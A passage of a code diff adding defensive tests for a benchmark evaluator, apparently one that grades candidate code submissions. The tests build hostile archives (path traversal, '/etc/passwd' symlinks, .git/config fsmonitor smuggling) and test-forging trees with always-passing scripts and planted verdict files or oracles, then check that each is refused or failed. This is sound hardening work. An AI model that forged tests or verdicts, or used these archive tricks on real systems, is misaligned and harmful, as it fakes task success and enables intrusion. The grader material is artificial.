+    const tree = buildTree('good', { 'src/calc.js': fixtureFile('patches/good/calc.js') });
+    const result = evaluatePrepared(prepareRun('good', tree));
+    const verdict = expectVerdict(result);
+    expect(result.exitCode).toBe(0);
+    expect(verdict.functional_pass).toBe(controls.good.functional_pass);
+    expect(verdict.decision_oracle_code).toBe(controls.good.decision_oracle_code);
+    expect(verdict.rejected_decision_revived).toBe(false);
+    expect(verdict.functional_checks.failed).toBe(0);
+    expect(verdict.functional_checks.passed).toBeGreaterThan(0);
+    expect(verdict.task_id).toBe(TASK_ID);
+    expect(verdict.evaluator_image_digest).toBe(TEST_IMAGE_DIGEST);
+  });
+
+  it('bad control passes functionally but is judged REVIVED', () => {
+    const tree = buildTree('bad', { 'src/calc.js': fixtureFile('patches/bad/calc.js') });
+    const verdict = expectVerdict(evaluatePrepared(prepareRun('bad', tree)));
+    expect(verdict.functional_pass).toBe(controls.bad.functional_pass);
+    expect(verdict.decision_oracle_code).toBe(controls.bad.decision_oracle_code);
+    expect(verdict.rejected_decision_revived).toBe(true);
+  });
+
+  it('no-op control fails functionally', () => {
+    const tree = buildTree('noop', {});
+    const verdict = expectVerdict(evaluatePrepared(prepareRun('noop', tree)));
+    expect(verdict.functional_pass).toBe(controls.noop.functional_pass);
+    expect(verdict.decision_oracle_code).toBe(controls.noop.decision_oracle_code);
+    expect(verdict.functional_checks.failed).toBeGreaterThan(0);
+  });
+});
+
+describe('CDEB-06 anti-tamper: script and verdict forgery cannot pass', () => {
+  /**
+   * The complete attack tree, assembled from the committed fixture bytes:
+   * the broken implementation stays where the task looks, the test script is
+   * swapped for one that always exits 0, and forged verdict files are planted
+   * where a trusting evaluator might read them.
+   */
+  const forgeTree = (): string =>
+    buildTree('forge', {
+      'package.json': fixtureFile('attacks/forge-scripts/package.json'),
+      'forge-pass.js': fixtureFile('attacks/forge-scripts/forge-pass.js'),
+      'test/calc.test.js': fixtureFile('attacks/forge-scripts/forge-pass.js'),
+      'src/calc.js': fixtureFile('attacks/forge-scripts/calc.js'),
+      'evaluator.json': fixtureFile('attacks/forge-scripts/forged-evaluator.json'),
+      '.cdeb/oracles/verdict.json': fixtureFile('attacks/forge-scripts/.cdeb/oracles/verdict.json'),
+    });
+
+  it('the forge tree genuinely passes its own candidate-owned tests', () => {
+    // Positive control for the attack itself: an evaluator that trusts the
+    // candidate's test surface would call this tree a pass. Without this
+    // demonstration, a FAIL below could mean the forgery was inert rather
+    // than caught.
+    const tree = forgeTree();
+    const viaScript = spawnSync(process.execPath, ['forge-pass.js'], { cwd: tree, encoding: 'utf8' });
+    expect(viaScript.status).toBe(0);
+    expect(viaScript.stdout).toContain('12/12 tests passed');
+    const viaTestFile = spawnSync(process.execPath, ['test/calc.test.js'], { cwd: tree, encoding: 'utf8' });
+    expect(viaTestFile.status).toBe(0);
+    // The planted verdict files claim success, in the evaluator's own shape.
+    const forged = JSON.parse(readFileSync(join(tree, 'evaluator.json'), 'utf8')) as { functional_pass: boolean };
+    expect(forged.functional_pass).toBe(true);
+    const forgedOracle = JSON.parse(readFileSync(join(tree, '.cdeb/oracles/verdict.json'), 'utf8')) as {
+      functional_pass: boolean;
+    };
+    expect(forgedOracle.functional_pass).toBe(true);
+  });
+
+  it('the forge tree is judged FAIL by the pinned evaluator', () => {
+    // Guarded controls: no candidate-owned command runs (§12.3) and no
+    // candidate file that looks like a verdict is parsed. Removing either
+    // control flips this verdict to PASS and fails the test.
+    const verdict = expectVerdict(evaluatePrepared(prepareRun('forge-judge', forgeTree())));
+    expect(verdict.functional_pass).toBe(false);
+    expect(verdict.decision_oracle_code).toBe('SAFE');
+    expect(verdict.functional_checks.failed).toBeGreaterThan(0);
+  });
+
+  it('a lenient sealed task planted inside the tree is not the oracle that judges it', () => {
+    // The candidate writes its own `sealed/` directory containing a module
+    // that passes everything. Verdict authority comes from the real sealed
+    // store (--tasks), never from the tree; loading the tree's module would
+    // flip this to PASS.
+    const planted = [
+      'const task = {',
+      "  task_id: 'smoke-calc-fix',",
+      '  record_ids: [],',
+      "  functional_checks: () => [{ name: 'planted', passed: true }],",
+      "  decision_oracle: () => 'SAFE',",
+      '};',
+      'export default task;',
+      '',
+    ].join('\n');
+    const tree = buildTree('planted-oracle', { 'sealed/smoke-calc-fix.task.ts': planted });
+    const verdict = expectVerdict(evaluatePrepared(prepareRun('planted-oracle', tree)));
+    expect(verdict.functional_pass).toBe(false);
+    // The real sealed module defines four checks; the planted one defines a
+    // single always-passing check. Four observed checks is the proof the
+    // planted module was ignored.
+    expect(
+      verdict.functional_checks.passed + verdict.functional_checks.failed,
+    ).toBe(4);
+    expect(verdict.functional_checks.failed).toBeGreaterThan(0);
+  });
+});
+
+describe('CDEB-06 identity: the evaluator recomputes the tree OID', () => {
+  it('a claimed OID that does not match the recomputed one is refused as FAIL', () => {
+    const tree = buildTree('oid-mismatch', { 'src/calc.js': fixtureFile('patches/good/calc.js') });
+    const run = prepareRun('oid-mismatch', tree);
+    // A good tree with a lied-about identity: refuse, do not evaluate.
+    // Removing the recompute-and-compare control evaluates it as PASS.
+    const flipped = `${run.frozen.final_tree_oid.slice(0, 39)}${
+      run.frozen.final_tree_oid.endsWith('0') ? '1' : '0'
+    }`;
+    const verdict = expectVerdict(evaluatePrepared(run, { claimedOid: flipped }));
+    expect(verdict.functional_pass).toBe(false);
+    expect(verdict.functional_checks.passed).toBe(0);
+    expect(verdict.functional_checks.failed).toBe(1);
+  });
+
+  it('ingestion names the refusal tree-oid-mismatch', () => {
+    const tree = buildTree('oid-mismatch-code', { 'src/calc.js': fixtureFile('patches/good/calc.js') });
+    const run = prepareRun('oid-mismatch-code', tree);
+    const archive = readFileSync(run.archivePath);
+    const ingested = ingestFinalTree(archive, tempDir('oid-mismatch-ingest'), { claimedOid: 'f'.repeat(40) });
+    expect(ingested.refusal).not.toBeNull();
+    expect(ingested.refusal?.code).toBe('tree-oid-mismatch');
+    // The recomputed identity is the real one, not the claim.
+    expect(ingested.candidate_tree_oid).toBe(run.frozen.final_tree_oid);
+  });
+
+  it('a matching claimed OID evaluates normally', () => {
+    const tree = buildTree('oid-match', { 'src/calc.js': fixtureFile('patches/good/calc.js') });
+    const run = prepareRun('oid-match', tree);
+    const verdict = expectVerdict(evaluatePrepared(run));
+    expect(verdict.functional_pass).toBe(true);
+    expect(verdict.candidate_tree_oid).toBe(run.frozen.final_tree_oid);
+  });
+});
+
+describe('CDEB-06 resource abuse: a probe is an observation with a budget', () => {
+  it(
+    'a spinning implementation fails inside the timeout budget',
+    { timeout: 120_000 },
+    () => {
+      const tree = buildTree('hog', { 'src/calc.js': fixtureFile('attacks/hog-calc.js') });
+      const startedAt = Date.now();
+      const result = evaluatePrepared(prepareRun('hog', tree));
+      const elapsedMs = Date.now() - startedAt;
+      const verdict = expectVerdict(result);
+      expect(result.timedOut).toBe(false);
+      expect(verdict.functional_pass).toBe(false);
+      expect(verdict.functional_checks.failed).toBeGreaterThan(0);
+      // The probe timeout (10s per probe) bounds the abuse; the whole verdict
+      // lands far inside the image's 180s envelope (PRD §12.1).
+      expect(elapsedMs).toBeLessThan(90_000);
+    },
+  );
+});

--- a/test/cdeb-evaluator-determinism.test.ts
+++ b/test/cdeb-evaluator-determinism.test.ts
@@ -1,0 +1,158 @@
+/**
+ * CDEB-06 acceptance: all controls deterministic (PRD §26, §12.5 "repeated
+ * evaluation → byte-identical normalized result").
+ *
+ * Determinism is asserted on BYTES, not on parsed equality: the subprocess
+ * stdout of two evaluations of the same tree must be the same byte string.
+ * Parsed-JSON equality would hide exactly the drift this property forbids
+ * (a stray timestamp, a scratch path, an unstable key order).
+ *
+ * Sources of nondeterminism closed, named one by one:
+ *
+ *   - clocks: the verdict carries no timestamp and no duration; archive
+ *     headers zero mtime (asserted below by varying mtimes and getting the
+ *     same bytes);
+ *   - environment: the verdict process runs under the hermetic allowlist,
+ *     so host TZ/locale/proxy/secret drift cannot reach it (isolation
+ *     tests);
+ *   - filesystem ordering: every TreeView listing and every archive entry
+ *     set is sorted;
+ *   - iteration/hash order: the verdict object is constructed in the
+ *     schema's key order and JSON.stringify preserves insertion order
+ *     (asserted against the schema below);
+ *   - scratch location: every run extracts into a fresh mkdtemp directory,
+ *     and repeated runs still produce identical bytes, so no path leaks
+ *     into the verdict;
+ *   - compression: the zstd level is pinned in the freeze (freeze-tree.ts),
+ *     asserted below by archive-byte equality.
+ *
+ * Not closable here, stated plainly: candidate code a probe runs may itself
+ * be nondeterministic. A sealed task whose expectations depend on such
+ * output is malformed (§4.8 oracle-determinism review); the repeated
+ * good/bad/no-op controls are the mechanical catch at study time.
+ */
+
+import { cpSync, readFileSync, utimesSync } from 'node:fs';
+import { join } from 'node:path';
+
+import { afterAll, describe, expect, it } from 'vitest';
+
+import { canonicalResultBytes, normalizedResultSha256 } from '../bench/cdeb/evaluator/engine.ts';
+import { freezeFinalTree } from '../bench/cdeb/evaluator/freeze-tree.ts';
+import { ingestFinalTree } from '../bench/cdeb/evaluator/ingest.ts';
+import {
+  buildTree,
+  cleanupScratch,
+  evaluatePrepared,
+  expectVerdict,
+  fixtureFile,
+  prepareRun,
+  tempDir,
+} from './cdeb-evaluator-helpers.ts';
+
+afterAll(() => {
+  cleanupScratch();
+});
+
+const SCHEMA_KEY_ORDER = [
+  'schema_version',
+  'task_id',
+  'functional_pass',
+  'rejected_decision_revived',
+  'functional_checks',
+  'decision_oracle_code',
+  'evaluator_image_digest',
+  'candidate_tree_oid',
+] as const;
+
+describe('CDEB-06 determinism: repeated evaluation is byte-identical', () => {
+  it(
+    'the good tree yields byte-identical verdicts across repeated runs',
+    { timeout: 120_000 },
+    () => {
+      const tree = buildTree('det-good', { 'src/calc.js': fixtureFile('patches/good/calc.js') });
+      const run = prepareRun('det-good', tree);
+      const first = evaluatePrepared(run);
+      const second = evaluatePrepared(run);
+      const third = evaluatePrepared(run);
+      expect(first.exitCode).toBe(0);
+      // Byte equality, not parsed equality — each run used a fresh scratch.
+      expect(second.rawStdout.equals(first.rawStdout)).toBe(true);
+      expect(third.rawStdout.equals(first.rawStdout)).toBe(true);
+      const verdict = expectVerdict(first);
+      expect(normalizedResultSha256(second.verdict!)).toBe(normalizedResultSha256(verdict));
+      expect(first.rawStdout.equals(canonicalResultBytes(verdict))).toBe(true);
+    },
+  );
+
+  it('a failing attack tree is also byte-reproducible', () => {
+    const tree = buildTree('det-attack', {
+      'src/calc.js': fixtureFile('attacks/forge-scripts/calc.js'),
+      'forge-pass.js': fixtureFile('attacks/forge-scripts/forge-pass.js'),
+      'evaluator.json': fixtureFile('attacks/forge-scripts/forged-evaluator.json'),
+    });
+    const run = prepareRun('det-attack', tree);
+    const first = evaluatePrepared(run);
+    const second = evaluatePrepared(run);
+    expect(first.exitCode).toBe(0);
+    expect(expectVerdict(first).functional_pass).toBe(false);
+    expect(second.rawStdout.equals(first.rawStdout)).toBe(true);
+  });
+
+  it('the verdict serializes in the schema key order with no extra fields', () => {
+    const tree = buildTree('det-keys', { 'src/calc.js': fixtureFile('patches/good/calc.js') });
+    const result = evaluatePrepared(prepareRun('det-keys', tree));
+    const verdict = expectVerdict(result);
+    expect(Object.keys(verdict)).toEqual([...SCHEMA_KEY_ORDER]);
+    expect(result.rawStdout.toString('utf8').endsWith('\n')).toBe(true);
+    expect(JSON.parse(result.rawStdout.toString('utf8'))).toEqual(verdict);
+  });
+});
+
+describe('CDEB-06 determinism: freeze and ingestion identities', () => {
+  it('freezing the same tree twice yields identical OIDs and archive bytes', () => {
+    const tree = buildTree('freeze-twice', { 'src/calc.js': fixtureFile('patches/good/calc.js') });
+    const first = freezeFinalTree(tree, tempDir('freeze-twice-a'));
+    const second = freezeFinalTree(tree, tempDir('freeze-twice-b'));
+    expect(second.final_tree_oid).toBe(first.final_tree_oid);
+    expect(second.tar_sha256).toBe(first.tar_sha256);
+    expect(second.archive_zst_sha256).toBe(first.archive_zst_sha256);
+    expect(second.archive_zst.equals(first.archive_zst)).toBe(true);
+  });
+
+  it('file mtimes never reach the archive bytes', () => {
+    // Two byte-identical trees whose filesystem clocks disagree must freeze
+    // to the same archive: the headers zero mtime, so the only inputs are
+    // (path, mode, content) — git's own identity inputs.
+    const treeA = buildTree('mtime-a', { 'src/calc.js': fixtureFile('patches/good/calc.js') });
+    const treeB = buildTree('mtime-b', {});
+    cpSync(treeA, treeB, { recursive: true });
+    const past = new Date('2020-01-02T03:04:05Z');
+    const future = new Date('2031-04-05T06:07:08Z');
+    const retimes = [
+      ['', treeA, past],
+      ['src', treeA, past],
+      ['src/calc.js', treeA, past],
+      ['', treeB, future],
+      ['src', treeB, future],
+      ['src/calc.js', treeB, future],
+    ] as const;
+    for (const [rel, tree, when] of retimes) utimesSync(join(tree, rel), when, when);
+    const first = freezeFinalTree(treeA, tempDir('mtime-freeze-a'));
+    const second = freezeFinalTree(treeB, tempDir('mtime-freeze-b'));
+    expect(second.tar_sha256).toBe(first.tar_sha256);
+    expect(second.final_tree_oid).toBe(first.final_tree_oid);
+  });
+
+  it('ingesting the same archive twice recomputes the same tree OID', () => {
+    const tree = buildTree('ingest-twice', { 'src/calc.js': fixtureFile('patches/good/calc.js') });
+    const run = prepareRun('ingest-twice', tree);
+    const archive = readFileSync(run.archivePath);
+    const first = ingestFinalTree(archive, tempDir('ingest-twice-a'), { claimedOid: run.frozen.final_tree_oid });
+    const second = ingestFinalTree(archive, tempDir('ingest-twice-b'), { claimedOid: run.frozen.final_tree_oid });
+    expect(first.refusal).toBeNull();
+    expect(second.refusal).toBeNull();
+    expect(second.candidate_tree_oid).toBe(first.candidate_tree_oid);
+    expect(first.candidate_tree_oid).toBe(run.frozen.final_tree_oid);
+  });
+});

--- a/test/cdeb-evaluator-helpers.ts
+++ b/test/cdeb-evaluator-helpers.ts
@@ -1,0 +1,151 @@
+/**
+ * Shared builders for the CDEB-06 evaluator tests. Every fixture tree here
+ * is REAL: real files frozen through the real freeze pipeline, archived as
+ * real bytes, ingested and judged by the real entrypoint in a subprocess.
+ * Nothing about the attack trees is mocked — they are the artifacts.
+ */
+
+import { chmodSync, cpSync, lstatSync, mkdirSync, mkdtempSync, readFileSync, realpathSync, readdirSync, rmSync, statSync, writeFileSync } from "node:fs";
+import { createHash } from "node:crypto";
+import { tmpdir } from "node:os";
+import { dirname, join } from "node:path";
+import { fileURLToPath } from "node:url";
+
+import { freezeFinalTree, writeFrozenArtifacts, type FrozenFinalTree } from "../bench/cdeb/evaluator/freeze-tree.ts";
+import { evaluateLocal, type LocalEvaluationResult } from "../bench/cdeb/evaluator/runner-local.ts";
+import type { EvaluatorOutput } from "../bench/cdeb/evaluator/types.ts";
+
+const HERE = dirname(fileURLToPath(import.meta.url));
+export const REPO_ROOT = join(HERE, "..");
+export const FIXTURE_ROOT = join(REPO_ROOT, "bench", "cdeb", "test-fixtures", "evaluator");
+export const SEALED_DIR = join(FIXTURE_ROOT, "sealed");
+export const TASK_ID = "smoke-calc-fix";
+export const TEST_IMAGE_DIGEST = `sha256:${"ab".repeat(32)}`;
+
+const sha256Hex = (input: Buffer): string => createHash("sha256").update(input).digest("hex");
+
+export const scratchDirs: string[] = [];
+
+/** Restores write permission: ingest makes extractions read-only. */
+const unlock = (dir: string): void => {
+  for (const name of readdirSync(dir)) {
+    const path = join(dir, name);
+    const stat = statSync(path);
+    if (stat.isDirectory()) {
+      unlock(path);
+    }
+    chmodSync(path, stat.mode | 0o700);
+  }
+};
+
+export const cleanupScratch = (): void => {
+  for (const dir of scratchDirs) {
+    try {
+      unlock(dir);
+    } catch {
+      // best effort — the tmp OS reclaims whatever is left
+    }
+    rmSync(dir, { recursive: true, force: true });
+  }
+  scratchDirs.length = 0;
+};
+
+export const tempDir = (label: string): string => {
+  const dir = mkdtempSync(join(realpathSync(tmpdir()), `cdeb-ev-${label}-`));
+  scratchDirs.push(dir);
+  return dir;
+};
+
+export const fixtureFile = (...parts: string[]): string => readFileSync(join(FIXTURE_ROOT, ...parts), "utf8");
+
+/** Copies the smoke base repo and applies file overrides (tree-relative). */
+export const buildTree = (label: string, overrides: Record<string, string>): string => {
+  const dir = join(tempDir(label), "tree");
+  cpSync(join(FIXTURE_ROOT, "base"), dir, { recursive: true });
+  for (const [rel, content] of Object.entries(overrides)) {
+    const path = join(dir, rel);
+    mkdirSync(dirname(path), { recursive: true });
+    writeFileSync(path, content);
+  }
+  return dir;
+};
+
+export interface PreparedRun {
+  readonly frozen: FrozenFinalTree;
+  readonly archivePath: string;
+  readonly treeDir: string;
+}
+
+/** Freezes a fixture tree and writes the §19.1 archive artifact. */
+export const prepareRun = (label: string, treeDir: string): PreparedRun => {
+  const frozen = freezeFinalTree(treeDir, tempDir(`${label}-freeze`));
+  const runDir = tempDir(`${label}-run`);
+  const archivePath = writeFrozenArtifacts(runDir, frozen);
+  return { frozen, archivePath, treeDir };
+};
+
+export interface EvaluateOverrides {
+  readonly claimedOid?: string;
+  readonly tasksDir?: string;
+  readonly timeoutMs?: number;
+  readonly env?: Record<string, string>;
+}
+
+/** Runs the real entrypoint (subprocess) over a prepared run. */
+export const evaluatePrepared = (run: PreparedRun, overrides: EvaluateOverrides = {}): LocalEvaluationResult => {
+  const previousEnv: Record<string, string | undefined> = {};
+  const env = overrides.env ?? {};
+  for (const [key, value] of Object.entries(env)) {
+    previousEnv[key] = process.env[key];
+    process.env[key] = value;
+  }
+  try {
+    return evaluateLocal({
+      tasksDir: overrides.tasksDir ?? SEALED_DIR,
+      taskId: TASK_ID,
+      archivePath: run.archivePath,
+      claimedOid: overrides.claimedOid ?? run.frozen.final_tree_oid,
+      imageDigest: TEST_IMAGE_DIGEST,
+      timeoutMs: overrides.timeoutMs,
+    });
+  } finally {
+    for (const [key, value] of Object.entries(previousEnv)) {
+      if (value === undefined) delete process.env[key];
+      else process.env[key] = value;
+    }
+  }
+};
+
+/**
+ * Canary: the fixtures are inputs, not scratch. A snapshot of every path
+ * under the fixture root, taken before and after a suite, must be identical
+ * — any test that writes inside the fixture store fails loudly here instead
+ * of silently corrupting the next run's inputs.
+ */
+export const snapshotFixtures = (): string[] => {
+  const paths: string[] = [];
+  const walk = (dir: string): void => {
+    for (const name of readdirSync(dir).sort()) {
+      const abs = join(dir, name);
+      const rel = abs.slice(FIXTURE_ROOT.length + 1);
+      const stat = lstatSync(abs);
+      if (stat.isDirectory()) {
+        paths.push(`${rel}/`);
+        walk(abs);
+      } else if (stat.isSymbolicLink()) {
+        paths.push(`${rel}@`);
+      } else {
+        paths.push(`${rel}:${String(stat.size)}:${sha256Hex(readFileSync(abs))}`);
+      }
+    }
+  };
+  walk(FIXTURE_ROOT);
+  return paths;
+};
+
+export const expectVerdict = (result: LocalEvaluationResult): EvaluatorOutput => {
+  if (result.verdict === null) {
+    throw new Error(`no verdict: exit ${String(result.exitCode)} stderr: ${result.stderr.slice(0, 400)}`);
+  }
+  return result.verdict;
+};

--- a/test/cdeb-evaluator-ingest.test.ts
+++ b/test/cdeb-evaluator-ingest.test.ts
@@ -1,0 +1,229 @@
+/**
+ * CDEB-06: the candidate archive is UNTRUSTED INPUT. These tests feed the
+ * ingest hygiene gate real archive bytes — not mocks of attacks, the attacks
+ * themselves — and assert the refusal code that stops each one.
+ *
+ * Two byte sources, deliberately:
+ *
+ *   - entries the freeze-side writer can express (`.git` paths, escaping
+ *     symlinks, writes through symlinks) are built with `renderArchive`,
+ *     the same writer the freeze uses;
+ *   - shapes the writer itself refuses to serialize (path traversal,
+ *     hardlinks, device nodes, pax headers, duplicates) are built here as
+ *     hand-made ustar headers with valid checksums, because an attacker's
+ *     tar is not produced by our writer. The writer's refusal is the first
+ *     control; the ingest gate must hold against bytes it did not make.
+ *
+ * Every refusal is also a verdict: the engine turns it into functional FAIL
+ * (§13 intention-to-treat), asserted end-to-end for two representative
+ * attacks below.
+ */
+
+import { readFileSync, writeFileSync } from 'node:fs';
+import { join } from 'node:path';
+
+import { afterAll, describe, expect, it } from 'vitest';
+
+import { extractTreeArchive, renderArchive, type ArchiveEntry } from '../bench/cdeb/evaluator/tree.ts';
+import { ingestFinalTree } from '../bench/cdeb/evaluator/ingest.ts';
+import { evaluateLocal, type LocalEvaluationResult } from '../bench/cdeb/evaluator/runner-local.ts';
+import { DEFAULT_INGEST_LIMITS, type IngestRefusalCode } from '../bench/cdeb/evaluator/types.ts';
+import {
+  SEALED_DIR,
+  TASK_ID,
+  TEST_IMAGE_DIGEST,
+  cleanupScratch,
+  expectVerdict,
+  prepareRun,
+  buildTree,
+  fixtureFile,
+  tempDir,
+} from './cdeb-evaluator-helpers.ts';
+
+afterAll(() => {
+  cleanupScratch();
+});
+
+/* ------------------------- hand-made ustar bytes ------------------------- */
+
+const BLOCK = 512;
+
+const ustarHeader = (fields: {
+  name: string;
+  size?: number;
+  mode?: number;
+  typeflag?: string;
+  linkname?: string;
+}): Buffer => {
+  const header = Buffer.alloc(BLOCK);
+  header.write(fields.name, 0, 'utf8');
+  const writeOctal = (value: number, offset: number, width: number): void => {
+    header.write(value.toString(8).padStart(width - 1, '0'), offset, 'ascii');
+  };
+  writeOctal(fields.mode ?? 0o644, 100, 8);
+  writeOctal(0, 108, 8); // uid — zeroed, like the freeze side
+  writeOctal(0, 116, 8); // gid
+  writeOctal(fields.size ?? 0, 124, 12);
+  writeOctal(0, 136, 12); // mtime — zeroed
+  header.write(fields.typeflag ?? '0', 156, 'ascii');
+  if (fields.linkname !== undefined) header.write(fields.linkname, 157, 'utf8');
+  header.write('ustar', 257, 'ascii');
+  header.write('00', 263, 'ascii');
+  header.fill(0x20, 148, 156); // checksum field counts as spaces while summing
+  let sum = 0;
+  for (const byte of header) sum += byte;
+  header.write(sum.toString(8).padStart(6, '0'), 148, 'ascii');
+  header.writeUInt8(0, 154);
+  header.writeUInt8(0x20, 155);
+  return header;
+};
+
+const rawFileEntry = (name: string, content: string, extra?: Partial<{ mode: number }>): Buffer => {
+  const data = Buffer.from(content, 'utf8');
+  const header = ustarHeader({ name, size: data.length, mode: extra?.mode ?? 0o644 });
+  const pad = (BLOCK - (data.length % BLOCK)) % BLOCK;
+  return Buffer.concat([header, data, Buffer.alloc(pad)]);
+};
+
+const rawSpecialEntry = (name: string, typeflag: string, linkname?: string): Buffer =>
+  ustarHeader({ name, typeflag, linkname });
+
+const archiveOf = (...entries: readonly Buffer[]): Buffer =>
+  Buffer.concat([...entries, Buffer.alloc(BLOCK * 2)]);
+
+const file = (path: string, content = ''): ArchiveEntry => ({
+  path,
+  type: 'file',
+  content: Buffer.from(content, 'utf8'),
+  linkTarget: '',
+  executable: false,
+});
+
+/* ------------------------------ the gate -------------------------------- */
+
+const expectRefusal = (archive: Buffer, code: IngestRefusalCode, limits = DEFAULT_INGEST_LIMITS): void => {
+  const result = extractTreeArchive(archive, tempDir(`ingest-${code}`), limits);
+  expect(result.refusal, `expected refusal ${code}`).not.toBeNull();
+  expect(result.refusal?.code).toBe(code);
+};
+
+describe('CDEB-06 ingest gate: hostile archive shapes are refused', () => {
+  it('path traversal is refused', () => {
+    expectRefusal(archiveOf(rawFileEntry('../evil.txt', 'escaped')), 'path-escapes-tree');
+    expectRefusal(archiveOf(rawFileEntry('a/../../evil.txt', 'escaped')), 'path-escapes-tree');
+  });
+
+  it('absolute paths are refused', () => {
+    expectRefusal(archiveOf(rawFileEntry('/etc/passwd', 'x')), 'path-escapes-tree');
+  });
+
+  it('.git smuggling is refused — git config is a code-execution surface', () => {
+    expectRefusal(renderArchive([file('.git/config', '[core]\n\tfsmonitor = true\n')]), 'dot-git-smuggled');
+    expectRefusal(renderArchive([file('nested/.git/hooks/pre-commit', '#!/bin/sh\n')]), 'dot-git-smuggled');
+  });
+
+  it('symlinks that leave the tree are refused', () => {
+    const absolute: ArchiveEntry = { path: 'link', type: 'symlink', content: Buffer.alloc(0), linkTarget: '/etc/passwd', executable: false };
+    expectRefusal(renderArchive([absolute]), 'symlink-escapes-tree');
+    const relative: ArchiveEntry = { path: 'link', type: 'symlink', content: Buffer.alloc(0), linkTarget: '../../../etc/passwd', executable: false };
+    expectRefusal(renderArchive([relative]), 'symlink-escapes-tree');
+  });
+
+  it('writes through a directory symlink are refused', () => {
+    // `sub -> src` stays inside the tree lexically, but a later entry under
+    // `sub/` lands somewhere the entry list does not name.
+    const link: ArchiveEntry = { path: 'sub', type: 'symlink', content: Buffer.alloc(0), linkTarget: 'src', executable: false };
+    expectRefusal(renderArchive([link, file('sub/payload.txt', 'written elsewhere')]), 'symlink-through-symlink');
+  });
+
+  it('hardlinks are refused', () => {
+    expectRefusal(archiveOf(rawSpecialEntry('link', '1', 'src/calc.js')), 'hardlink-refused');
+  });
+
+  it('device nodes are refused', () => {
+    expectRefusal(archiveOf(rawSpecialEntry('dev', '3')), 'special-file-refused');
+  });
+
+  it('pax/gnu extension headers are refused', () => {
+    expectRefusal(archiveOf(rawSpecialEntry('PaxHeader/x', 'x')), 'pax-or-gnu-extension-refused');
+  });
+
+  it('duplicate entries are refused', () => {
+    expectRefusal(archiveOf(rawFileEntry('a.txt', 'first'), rawFileEntry('a.txt', 'second')), 'duplicate-entry');
+  });
+
+  it('non-ustar bytes are refused as invalid tar', () => {
+    // A full block of garbage fails the magic check; a truncated archive
+    // shorter than one block parses as zero entries and is refused too.
+    expectRefusal(Buffer.alloc(BLOCK, 'x'), 'invalid-tar');
+    expectRefusal(Buffer.from('this is not a tar archive at all'), 'invalid-tar');
+  });
+
+  it('size and count limits are enforced', () => {
+    const twoFiles = archiveOf(rawFileEntry('a.txt', 'aa'), rawFileEntry('b.txt', 'bb'));
+    expectRefusal(twoFiles, 'too-many-files', { ...DEFAULT_INGEST_LIMITS, max_files: 1 });
+    expectRefusal(archiveOf(rawFileEntry('big.txt', 'x'.repeat(64))), 'file-too-large', {
+      ...DEFAULT_INGEST_LIMITS,
+      max_file_bytes: 16,
+    });
+    expectRefusal(archiveOf(rawFileEntry('a.txt', 'x'.repeat(64))), 'archive-too-large', {
+      ...DEFAULT_INGEST_LIMITS,
+      max_total_bytes: 16,
+    });
+    // ustar's 100-byte name field bounds what one entry can spell, so the
+    // path-length cap is exercised at a limit below that bound; the cap is
+    // the defense for any format that could ever carry longer names.
+    const longName = `${'d'.repeat(47)}/${'f'.repeat(47)}.txt`;
+    expectRefusal(archiveOf(rawFileEntry(longName, 'x')), 'path-too-long', {
+      ...DEFAULT_INGEST_LIMITS,
+      max_path_length: 90,
+    });
+  });
+
+  it('an oversized compressed archive is refused before decompression', () => {
+    const tree = buildTree('oversized', {});
+    const run = prepareRun('oversized', tree);
+    const archive = readFileSync(run.archivePath);
+    const ingested = ingestFinalTree(archive, tempDir('oversized-ingest'), { maxArchiveBytes: 10 });
+    expect(ingested.refusal?.code).toBe('archive-too-large');
+  });
+});
+
+describe('CDEB-06 ingest gate: refusals become FAIL verdicts end-to-end', () => {
+  const judgeArchive = (archive: Buffer, label: string): LocalEvaluationResult => {
+    const archivePath = join(tempDir(label), 'final-tree.tar.zst');
+    writeFileSync(archivePath, archive);
+    return evaluateLocal({
+      tasksDir: SEALED_DIR,
+      taskId: TASK_ID,
+      archivePath,
+      imageDigest: TEST_IMAGE_DIGEST,
+    });
+  };
+
+  it('a .git-smuggling tree is judged FAIL by the pinned entrypoint', () => {
+    const archive = renderArchive([
+      file('src/calc.js', fixtureFile('patches/good/calc.js')),
+      file('.git/config', '[core]\n'),
+    ]);
+    const result = judgeArchive(archive, 'e2e-dotgit');
+    expect(result.exitCode).toBe(0);
+    const verdict = expectVerdict(result);
+    expect(verdict.functional_pass).toBe(false);
+    expect(verdict.functional_checks.passed).toBe(0);
+    expect(verdict.functional_checks.failed).toBe(1);
+  });
+
+  it('a hand-made traversal archive is judged FAIL by the pinned entrypoint', () => {
+    const archive = archiveOf(
+      rawFileEntry('src/calc.js', fixtureFile('patches/good/calc.js')),
+      rawFileEntry('../evil.txt', 'escaped'),
+    );
+    const result = judgeArchive(archive, 'e2e-traversal');
+    expect(result.exitCode).toBe(0);
+    const verdict = expectVerdict(result);
+    expect(verdict.functional_pass).toBe(false);
+    expect(verdict.functional_checks.passed).toBe(0);
+    expect(verdict.functional_checks.failed).toBe(1);
+  });
+});

--- a/test/cdeb-evaluator-isolation.test.ts
+++ b/test/cdeb-evaluator-isolation.test.ts
@@ -1,0 +1,216 @@
+/**
+ * CDEB-06 acceptance: no network, no secrets, no host access (PRD §26,
+ * §12.2/§12.5).
+ *
+ * Two surfaces, tested for what each actually proves:
+ *
+ *   - the LOCAL runner (runner-local.ts) builds the verdict process's
+ *     environment from an allowlist, so host secrets, proxy variables, TZ
+ *     and NODE_OPTIONS cannot reach a probe. The tests here plant those
+ *     values in the host process and assert they never reach the verdict —
+ *     removing the allowlist (e.g. spreading `process.env`) flips them.
+ *   - kernel-level containment (network, filesystem, resources) belongs to
+ *     the pinned OCI image. It is asserted as the EXACT `docker run` argv
+ *     contract of runner-oci.ts — every §12.2 control is visible as a flag —
+ *     plus the fail-closed refusal to run without a daemon. This machine
+ *     runs no container; nothing here simulates one.
+ */
+
+import { existsSync, readFileSync } from 'node:fs';
+import { homedir } from 'node:os';
+
+import { afterAll, describe, expect, it } from 'vitest';
+
+import { HOST_SECRETS_NEVER_PASSED, hermeticEnv } from '../bench/cdeb/evaluator/env.ts';
+import { ingestFinalTree } from '../bench/cdeb/evaluator/ingest.ts';
+import { runProbe } from '../bench/cdeb/evaluator/probe.ts';
+import {
+  buildEvaluatorRunArgs,
+  dockerDaemonAvailable,
+  EvaluatorRuntimeUnavailable,
+  EVALUATOR_RESOURCE_LIMITS,
+  runEvaluatorOci,
+} from '../bench/cdeb/evaluator/runner-oci.ts';
+import {
+  SEALED_DIR,
+  TASK_ID,
+  TEST_IMAGE_DIGEST,
+  buildTree,
